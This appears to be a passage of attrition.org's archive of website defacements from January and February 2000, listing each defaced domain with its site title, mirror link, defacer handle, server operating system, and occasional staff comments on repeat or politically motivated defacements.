Mirror: http://www.attrition.org/mirror/attrition/2000/01/26/www.sine.pi.gov.br
Defaced by: Crime Boy's
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: apes.ag.unr.edu
Site Title: University of Nevada
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/apes.ag.unr.edu
Defaced by: Team Echo
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: deptinfo.collegeem.qc.ca
Site Title: College Edouard-Montpetit
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/deptinfo.collegeem.qc.ca
Defaced by: Synoptic
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.mooney.com
Site Title: Mooney Aircraft, Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.mooney.com
Defaced by: PurpZey
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.credible.com
Site Title: Computer Credible
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/www.credible.com
Defaced by: Crime Boys
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.10.16 by FADFUCK
Potentially offensive content on defaced page.

Defaced domain: horizonsrv1.horizonpestcontrol.com
Site Title: Horizon Pest Control
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/horizonsrv1.horizonpestcontrol.com
Defaced by: The Keebler Elf
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: course.utsi.edu
Site Title: University of Tennessee Space Institute
Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/course.utsi.edu
Defaced by: Team Echo
Operating System: Windows NT (PWS-95/2.0)
Potentially offensive content on defaced page.
Defaced domain: www.kia.gov.kw
Site Title: Kuwait Government
Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.kia.gov.kw
Defaced by: Team Echo
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.aneel.gov.br
Site Title: Aneel-Agencia Nacional de Energia Eletrica
Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.aneel.gov.br
Defaced by: Rogue
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.stileproject.com
Site Title: Stile Project
Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.stileproject.com
Defaced by: C.M.A.S
Operating System: Linux
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Interesting political type hack

Defaced domain: www.ukrin.com
Site Title: Nowicky Pharma
Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.ukrin.com
Defaced by: slash
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.php.com
Site Title: Family Resource Center
Mirror: http://www.attrition.org/mirror/attrition/2000/01/28/www.php.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.okinawa.mpt.go.jp
Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.okinawa.mpt.go.jp
Defaced by: Chinese
Operating System: Solaris 2.5x
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.porno.co.za
Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.porno.co.za
Operating System: Red Hat Linux
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.cevi.be
Site Title: Belgium Centrum voor Informatica
Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.cevi.be
Operating System: Windows NT (Microsoft-IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.evvcivitan.org Site Title: Evansville Downtown Civitan Club Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.evvcivitan.org Defaced by: Pimp Operating System: Windows NT (Microsoft-IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.vea.org Site Title: Virtual Enterprises Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.vea.org Defaced by: slash Operating System: Windows NT (IIS/4.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page Defaced domain: www.undac.edu.pe Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.undac.edu.pe Defaced by: shredder Operating System: Windows NT (IIS/3.0) Potentially offensive content on defaced page. Defaced domain: www.lakelandc.ab.ca Site Title: Lakeland College Mirror: http://www.attrition.org/mirror/attrition/2000/01/29/www.lakelandc.ab.ca Defaced by: Net Illusion Potentially offensive content on defaced page. Defaced domain: www.nygatour.com Site Title: National Youth Golf Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.nygatour.com Defaced by: Artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mbce.com.sa Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.mbce.com.sa Defaced by: Artech Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.root.or.jp Site Title: root-net Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.root.or.jp Defaced by: fzk (China) Operating System: Windows NT (IIS/3.0) HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.tmig.or.jp Site Title: Tokyo Metropolitan Institute of Gerontology Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.tmig.or.jp Defaced by: China guangdong fzk Operating System: Solaris 2.3 - 2.4 HIDDEN comments in the HTML. 
Potentially offensive content on defaced page. Defaced domain: niu2.uniplac.rct-sc.br Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/niu2.uniplac.rct-sc.br Defaced by: dexter07 Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: apes.ag.unr.edu Site Title: University of Nevada Mirror: http://www.attrition.org/mirror/attrition/2000/01/27/apes.ag.unr.edu Defaced by: Team Echo Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.kidslearning.com Site Title: kids Learning Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.kidslearning.com Defaced by: thekiller Operating System: Windows 3.11 or 95 (Netscape-FastTrack/2.0a) Potentially offensive content on defaced page. Site Title: Alexei Malofeyev Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.xxx-boys.com Defaced by: Counter Culture Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.meikai.ac.jp Site Title: Meikai University Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.meikai.ac.jp Defaced by: fzk (China) Operating System: Solaris HIDDEN comments in the HTML. Potentially offensive content on defaced page. 
ATTRITION Staff Comment: The defacers left an email to reach them at in the HTML comments

Defaced domain: www.ccpm.com.mx
Site Title: CCPM
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ccpm.com.mx
Defaced by: alt3kx_h3z
Operating System: Solaris

Defaced domain: www.cdcs.com
Site Title: C & D Consulting, LLC
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.cdcs.com
Defaced by: PKiller
Operating System: Windows NT
Previously defaced on 99.11.14 00.01.22 by DHC slash

Defaced domain: www.hackernews.com.br
Site Title: Hacker News Brazil
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.hackernews.com.br
Defaced by: DHC
Operating System: Windows NT
Potentially offensive content on defaced page.
ATTRITION Staff Comment: It seems that DHC received the password from someone with HNB and then defaced it.

Defaced domain: as041.tel.hr
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/as041.tel.hr
Defaced by: netJoy
Operating System: Digital Unix
Potentially offensive content on defaced page.

Defaced domain: www.claudiaschiffer.com
Site Title: ptn media
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.claudiaschiffer.com
Defaced by: Dr_Delete
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.maxflow.com
Site Title: Maxflow, Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.maxflow.com
Defaced by: madhatt
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.nat32.com
Site Title: A.C.T. Software
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.nat32.com
Defaced by: madhatt
Operating System: Linux
Potentially offensive content on defaced page.

Site Title: SQL Systems
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.teamsql.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.topeo.com
Site Title: Topeo
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.topeo.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.ptnmediainc.com
Site Title: PTN Media Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ptnmediainc.com
Defaced by: Artech
Operating System: Windows NT

Defaced domain: www.salmankhan.com
Site Title: 481540 B.C. LTD.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.salmankhan.com
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.ccpm.com.mx
Site Title: Grupo C.C.P.M
Mirror: http://www.attrition.org/mirror/attrition/2000/01/30/www.ccpm.com.mx
Defaced by: kryptek
Operating System: Solaris 2.5x
Previously defaced on today by
Potentially offensive content on defaced page.

Defaced domain: www.one24.com
Site Title: ONE24, LLC
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.one24.com
Defaced by: wkD
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.jvc-america.com
Site Title: Rocktropolis Enterprises
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.jvc-america.com
Defaced by: messiah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.vcandrews.org
Site Title: Garden in the Sky (VC Andrews fan site)
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.vcandrews.org
Defaced by: wkD
Operating System: Linux
Potentially offensive content on defaced page.
Defaced domain: www.scas.acad.bg
Site Title: Bulgarian Student Computer Arts Society
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.scas.acad.bg
Defaced by: The Killer
Operating System: Windows 95 (Microsoft-PWS-95/2.0)
Potentially offensive content on defaced page.

Defaced domain: www.cevi.be
Site Title: CEVI
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.cevi.be
Defaced by: Carteblanche
Operating System: NT
Previously defaced on 00.01.29 by
Potentially offensive content on defaced page.

Defaced domain: www.temperance.com
Site Title: La Temperance
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.temperance.com
Defaced by: madhatt
Operating System: Cobalt Linux

Defaced domain: www.chesapeake-rehab.com
Site Title: Chesapeake Rehab Equipment Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.chesapeake-rehab.com
Defaced by: thekiller
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.travelersaid.org
Site Title: Travelers Aid International
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.travelersaid.org
Defaced by: Crime Boy's
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.18 by Analognet
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Also defaced: www.cisasailing.org

Defaced domain: www.webdr.com
Site Title: The WEB Doctor
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.webdr.com
Defaced by: wkD
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www-jmt.jst.go.jp
Site Title: Japan Science and Technology
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www-jmt.jst.go.jp
Defaced by: wds
Operating System: Solaris 2.3 - 2.4
Potentially offensive content on defaced page.

Defaced domain: www.zajtra.com
Site Title: Zajtra Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.zajtra.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.mbce.com.sa
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.mbce.com.sa
Defaced by: VSO Inc
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.30 by Artech
Potentially offensive content on defaced page.

Defaced domain: www.zonked.com
Site Title: Ian Mack
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.zonked.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: seoulca.seoulcad.co.kr
Site Title: Seoul JeonSan HakWon
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/seoulca.seoulcad.co.kr
Defaced by: synk
Operating System: ALZZA/Linux
Potentially offensive content on defaced page.

Defaced domain: absence.vortexq.com
Site Title: Vortex Q
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/absence.vortexq.com
Defaced by: savecore
Operating System: FreeBSD 2.2.1 - 4.0
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.th-bandt.com
Site Title: Cyber Cigar Direct Worldwide
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.th-bandt.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.levi.com
Site Title: Levi Strauss & Company
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.levi.com
Defaced by: avirex
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: www.pioneer.com.tw
Site Title: Vanguard Secureity Co
Mirror: http://www.attrition.org/mirror/attrition/2000/01/31/www.pioneer.com.tw
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.ironcurtaincorp.com
Site Title: Iron Curtain Corp
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.ironcurtaincorp.com
Defaced by: snow
Operating System: Red Hat Linux
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.mct.ro
Site Title: Romanian Ministry of Research and Technology
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.mct.ro
Defaced by: The Killer
Operating System: Windows NT

Defaced domain: www.vsop.isas.ac.jp
Site Title: Japanese Institute of Space and Astronautical Science, VLBI Space Observatory Programme
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.vsop.isas.ac.jp
Defaced by: fzk
Operating System: Solaris
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.schs.org
Site Title: South Christian High School
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.schs.org
Defaced by: TWS
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.jvcinfo.com
Site Title: JVC Information Products
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.jvcinfo.com
Defaced by: Crime Boys
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.darkharbingers.com
Site Title: Allen Edger
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.darkharbingers.com
Operating System: Windows
Potentially offensive content on defaced page.

Defaced domain: www.fantex.com
Site Title: C.S.TEC.USA., INC.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.fantex.com
Defaced by: paragone
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.levi.com
Site Title: Levi Strauss & Company
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/www.levi.com
Defaced by: avirex
Operating System: NT
Previously defaced on 00.01.31 by avirex
ATTRITION Staff Comment: 2nd defacement in 2 days of this site

Defaced domain: kssna.com
Site Title: Kyung Sung Sea&Air Co., Ltd.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/01/kssna.com
Defaced by: synk
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.car.gov.co
Site Title: Corporación Autónoma Regional de Cundinamarca
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.car.gov.co
Defaced by: The Killer
Operating System: Windows NT (Microsoft-IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.azlan.nl
Site Title: Azlan
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.azlan.nl
Defaced by: ViPER
Operating System: Windows NT (Microsoft-IIS/4.0)

Defaced domain: www.tcefl.pr.gov.br
Site Title: Companhia De Informatica Do Parana - Celepar
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.tcefl.pr.gov.br
Defaced by: VSO Team
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.csdept.keene.edu
Site Title: Keene State College
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.csdept.keene.edu
Defaced by: ner0tec
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.cdcs.com
Site Title: C & D Consulting, LLC
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.cdcs.com
Defaced by: VSO Inc
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.30, 00.01.22, 99.11.14 by PKiller, slash, DHC
Potentially offensive content on defaced page.
Defaced domain: www.partizan.co.yu
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.partizan.co.yu
Defaced by: SoiraM
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.rodmar.co.za
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.rodmar.co.za
Defaced by: Tr1pl3 S31S
Operating System: NT

Defaced domain: www.dnp.gov.co
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.dnp.gov.co
Defaced by: KabraLzZ
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.kidslearning.com
Site Title: kids Learning
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.kidslearning.com
Defaced by: OHB
Operating System: NT
Previously defaced on 00.01.30 by The Killer
Potentially offensive content on defaced page.

Defaced domain: www.maderacoe.k12.ca.us
Site Title: California K12 Schools
Mirror: http://www.attrition.org/mirror/attrition/2000/02/02/www.maderacoe.k12.ca.us
Defaced by: protokol
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.centralindiana.com
Site Title: Crawford Communications, Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.centralindiana.com
Defaced by: Team Echo
Operating System: Windows NT
Potentially offensive content on defaced page.

Site Title: CISA
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.cisasailing.org
Defaced by: Crime Boys
Operating System: Windows NT
Previously defaced on 00.01.21 by Team Echo
Potentially offensive content on defaced page.

Defaced domain: www.imaginet.co.za
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.imaginet.co.za
Defaced by: akt0r
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.compcom.com.au
Site Title: Communications Projects and Computing
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.compcom.com.au
Defaced by: Crime Boys
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.lschs.wyndmoor.pa.us
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.lschs.wyndmoor.pa.us
Defaced by: confusion
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: webhost.co.ocean.nj.us
Site Title: Ocean, New Jersey
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/webhost.co.ocean.nj.us
Defaced by: confusion
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: ns1.culver-city.ca.us
Site Title: Culver City, California
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/ns1.culver-city.ca.us
Defaced by: confusion
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: www.yolocounty.org
Site Title: AmrouTechnologies
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.yolocounty.org
Defaced by: confusion
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: www.lgenterprises.threadnet.com
Site Title: Thread Net Inc.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/www.lgenterprises.threadnet.com
Defaced by: ph33r the b33r
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: mccs.co.moore.nc.us
Mirror: http://www.attrition.org/mirror/attrition/2000/02/03/mccs.co.moore.nc.us
Defaced by: confusion
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: www.dreamshell.com
Site Title: DreamShell
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.dreamshell.com
Defaced by: Dor
Operating System: Red Hat Linux
Potentially offensive content on defaced page.
Defaced domain: www.chordboard.com
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.chordboard.com
Defaced by: snow
Operating System: Windows NT (IIS/3.0)
Potentially offensive content on defaced page.

Defaced domain: www.enoch.com
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.enoch.com
Defaced by: snow
Operating System: Windows NT (IIS/3.0)
Previously defaced on 99.05.17 by forpaxe
Potentially offensive content on defaced page.

Defaced domain: www.sglyne.com
Site Title: Sglyne
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.sglyne.com
Defaced by: DEATHaCeS 4nd InSt|nCt
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.metris.be
Site Title: Metris nv
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.metris.be
Defaced by: Illusions Team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cfaith.org
Site Title: Faith Center
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.cfaith.org
Defaced by: tws
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.tyranny.org
Site Title: Tyranny.org
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.tyranny.org
Defaced by: NeoTek
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.westcon.com
Site Title: Westcon Inc
Mirror: http://www.attrition.org/mirror/attrition/2000/02/04/www.westcon.com
Defaced by: Wild Karrde
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.environmentalshop.com
Site Title: Air & Waste Management Association
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.environmentalshop.com
Defaced by: moron signed as "(/)ï§/-ë®_Ë
Operating System: FreeBSD
ATTRITION Staff Comment: Netcraft: www.environmentalshop.com is running Microsoft-IIS/4.0 on

Defaced domain: www.ekitchennews.com
Site Title: SLTD Media Production
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.ekitchennews.com
Defaced by: nemesystm
Operating System: FreeBSD
Potentially offensive content on defaced page.

Defaced domain: www.dtr-software.com
Site Title: DTR Software International
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.dtr-software.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.cameo.com.tw
Site Title: Cameo Communications
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.cameo.com.tw
Defaced by: Crime Boys
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.09.08 by
Potentially offensive content on defaced page.

Defaced domain: www.sltd.com
Site Title: sltd
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.sltd.com
Defaced by: nemesystm
Operating System: FreeBSD
Potentially offensive content on defaced page.

Defaced domain: www.wohcrew.com
Site Title: WOH
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.wohcrew.com
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.setindia.com
Site Title: Sony Entertainment Television India
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.setindia.com
Defaced by: Harkat-ul-mOs
Operating System: Linux
Potentially offensive content on defaced page.
ATTRITION Staff Comment: Very interesting message in this defacement. Definite signs of hacktivism.
Defaced domain: www.nirveradio.com
Site Title: NIRVE Sports LTD
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.nirveradio.com
Defaced by: trent
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: careers.altavista.com
Site Title: Digital Equipment Corporation
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/careers.altavista.com
Defaced by: unknown
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: dolphin.kyungsung.ac.kr
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/dolphin.kyungsung.ac.kr
Defaced by: kryptek
Operating System: Solaris 2.5x
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.ehsal.be
Site Title: EHSAL
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.ehsal.be
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.scroc.com
Site Title: Scroc
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.scroc.com
Defaced by: Illusions Team
Operating System: Irix
Potentially offensive content on defaced page.

Defaced domain: www.lakelandc.ab.ca
Site Title: Lakeland College
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.lakelandc.ab.ca
Defaced by: Illusions Team
Operating System: Windows NT
Previously defaced on 00.01.29 by Net Illusion
Potentially offensive content on defaced page.

Defaced domain: venom.byu.edu
Site Title: Brigham Young University
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/venom.byu.edu
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.aneel.gov.br
Site Title: Aneel-Agencia Nacional de Energia Eletrica
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.aneel.gov.br
Defaced by: CYB3R FUCK3RS
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.28 by Rogue
Potentially offensive content on defaced page.

Defaced domain: www.crimewatch.co.za
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.crimewatch.co.za
Defaced by: #Dorknet
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: dedaana.otd.com
Site Title: OTD, Ltd.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/dedaana.otd.com
Defaced by: Illusions Team
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.xandria.com
Site Title: Lawrence Research Group
Mirror: http://www.attrition.org/mirror/attrition/2000/02/05/www.xandria.com
Defaced by: Protokol
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.hospital.uchile.cl
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.hospital.uchile.cl
Defaced by: BlacKcODe
Operating System: Red Hat Linux
Potentially offensive content on defaced page.

Defaced domain: www.dupeit.com
Site Title: Corporate Systems Center
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.dupeit.com
Defaced by: protokol
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
ATTRITION Staff Comment: mass: www.scsidrives.com

Defaced domain: xmail.senate.be
Site Title: Senat de Belgique
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/xmail.senate.be
Defaced by: #Dorknet
Operating System: Windows NT
Potentially offensive content on defaced page.
ATTRITION Staff Comment: This defacement has a message regarding Joerg Haider and the Austrian Freedom Party. Mention of possible targets in the *.gv.at domain.
(For more information about this issue, read: http://news.bbc.co.uk/hi/english/world/europe/newsid_632000/632039.stm )
The site of the Belgian Senate was defaced by Illusions Team and NOT #Dorknet. My apologies for the confusion.

Defaced domain: issfire1.co.palm-beach.fl.us
Site Title: ISS Firewall for Palm Beach County, Florida
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/issfire1.co.palm-beach.fl.us
Defaced by: suave
Operating System: Windows NT

Defaced domain: www.wetjeans.com
Site Title: WS Associates Ltd.
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.wetjeans.com
Defaced by: LA|Calif
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: www.xstreams.com
Site Title: Crawford Software
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.xstreams.com
Defaced by: LA|Calif
Operating System: Solaris
Potentially offensive content on defaced page.

Defaced domain: koala.harc.edu
Site Title: Houston Advanced Research Center
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/koala.harc.edu
Defaced by: suave
Operating System: WinNT
Potentially offensive content on defaced page.

Site Title: ESCOLA AGROTECNICA FEDERAL DE BAMBUI
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.eafbambui.gov.br
Defaced by: KabraLzZ
Operating System: WinNT
Potentially offensive content on defaced page.

Defaced domain: www.ivi.org
Site Title: International Vaccine Institute
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.ivi.org
Defaced by: suave
Operating System: Windows NT (IIS/4.0)
Previously defaced on 00.01.20 by confusion
Potentially offensive content on defaced page.

Defaced domain: www.harc.edu
Site Title: Houston Advanced Research Center
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.harc.edu
Defaced by: suave
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.lep.ibge.gov.br
Site Title: IBGE - Fundacao Instituto Brasileiro De Geografia
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.lep.ibge.gov.br
Defaced by: KabraLzZ
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.porzellanklinik.de
Site Title: PKS Porzellanklinik System GmbH
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.porzellanklinik.de
Defaced by: dot-slash crew
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.planetalatino.com
Site Title: Grupo Interconect
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.planetalatino.com
Defaced by: c0rvus
Operating System: NT
Potentially offensive content on defaced page.

Defaced domain: www.porno.co.za
Mirror: http://www.attrition.org/mirror/attrition/2000/02/06/www.porno.co.za
Defaced by: DoRKnET
Operating System: Red Hat Linux
Previously defaced on [00.01.29] by
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.cofcc.org
